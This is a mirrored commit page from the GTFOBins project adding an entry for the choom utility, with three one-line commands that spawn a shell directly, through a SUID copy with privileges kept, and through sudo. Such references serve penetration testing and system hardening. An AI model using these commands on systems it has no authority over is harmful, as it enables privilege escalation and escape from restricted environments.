1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-01-05 23:31:33 +01:00

Add choom

Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
This commit is contained in:
Miguel R 2022-05-13 09:28:11 +02:00 committed by GitHub
parent 720cc73c7e
commit 58bca80e6c
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23

9
_gtfobins/choom.md Normal file

@ -0,0 +1,9 @@
---
functions:
shell:
- code: choom -n 0 /bin/sh
suid:
- code: ./choom -n 0 -- /bin/sh -p
sudo:
- code: sudo choom -n 0 /bin/sh
---